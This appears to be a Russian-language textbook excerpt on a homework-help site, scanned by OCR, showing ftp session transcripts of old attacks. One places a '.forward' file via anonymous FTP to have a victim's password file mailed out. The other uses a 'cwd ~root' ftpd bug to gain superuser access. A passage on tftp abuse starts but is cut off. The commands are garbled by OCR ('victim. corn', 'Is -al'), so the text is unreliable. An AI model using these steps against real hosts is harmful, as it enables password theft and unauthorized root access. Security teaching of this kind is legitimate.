Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
150 ASCII data connection for /bin/is (192.192.192.1,1129) (0 bytes).
Total 5
Drwxr-xr-x4 101 1 512 Jun 20 1991. drwxr-xr-x 4 101 1512 Jun 20 1991..
Drwxr-xr-x2 01 512 Jun 20 1991 bin drwxr-kr-x2 0 1512 Jun 20 1991 etc
Drwxr-xr-x 3 101 1 512 Aug 22 1991 pub
ASCII Transfer complete.
242 bytes received in 0.066 seconds (3.6 Kbytes/s)
ftp> put forward_SLicker_fl.le.forward 43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit evil % echo test I mail ftp@vlctim. corn
Теперь хакер может просто ждать, пока файл с паролями не будет выслан ему. Очевидно, что такая атака
(как и следующая) является типичной по сценарию 2. Рассматривая ftp, вспомним совсем старую ошибку:
% ftp -п
ftp> open victim, corn
Connected to victim, corn
Victim, corn FTP-server ready.
ftp> quote user ftp
Guest login ok, send ident as password.
ftp> quote cwd "root
Please login with USER and PASS.
ftp> quote pass ftp
Guest login ok, access restrictions apply.
ftp> Is -al /
Если этот прием сработал, то атакующий теперь вошел в систему как суперпользователь. Далее мы
рассмотрим более свежие <дыры> в ftp-демонах.
Использование tftp
До сих пор существует (но почти не используется, по крайней мере в глобальных сетях) программа, подобная
Ftpd, - tftpd. Этот демон не требует пароля для аутентификации. Если хост предоставлял tftp без ограничения
Доступа (обычно с помощью установок флагов безопасности в файле inetd.conf), то атакующий получал
Дата публикования: 2014-11-04; Прочитано: 339 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!